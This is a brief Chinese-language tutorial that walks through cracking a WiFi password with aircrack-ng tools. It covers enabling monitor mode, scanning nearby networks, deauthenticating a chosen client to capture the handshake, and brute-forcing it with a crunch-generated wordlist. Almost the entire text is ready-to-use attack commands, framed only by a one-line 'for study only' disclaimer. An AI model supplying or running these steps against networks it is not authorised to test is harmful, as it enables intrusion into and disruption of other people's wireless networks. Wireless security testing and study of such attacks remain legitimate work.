本文仅作学习交流使用
严禁任何非法行为

查看网卡信息

ifconfig

杀死相关进程
启用网卡监听

airmon-ng check kill
airmon-ng start wlan0
  • wlan0 替换为你使用的网卡,以下默认

监听附近 wifi 信息,获取到需要的信息后 'Ctrl + C' 停止

airodump-ng wlan0mon
  • wlan0mon 替换为你使用的网卡,以下默认

查看路由器的详细信息,也可以查到链接了次路由器的设备

airodump-ng -c [channel] --bssid [BSSID] -w [file name] wlan0mon
  • channel 替换为路由器的信道
  • BSSID 替换为路由器的 BSSID(MAC 地址)
  • file name 替换为你想保存的文件名,可以填 '~/wifi'

执行命令攻击断开用户和主机的链接

aireplay-ng -0 50 -a [BSSID] -c [client MAC] wlan0mon
  • ‘-0’ 表示执行 deauth 攻击
  • ‘50’ 表示发送 50 个 deauth 包
  • ‘-a’ 指定路由器的 BSSID
  • ‘-c’ 指定目标设备的 MAC 地址

得以获得握手包,执行命令跑密码本尝试获取 wifi 密码

aircrack-ng wlan0mon.cap -w password.txt
  • wlan0mon.cap 是握手包
  • password.txt 是密码本

附:密码本的生成

crunch 9 9 -p 123 321 111 333 > /password.txt
  • 'p' 前面指定密码位数,'9 9' 表示 9 位到 9 位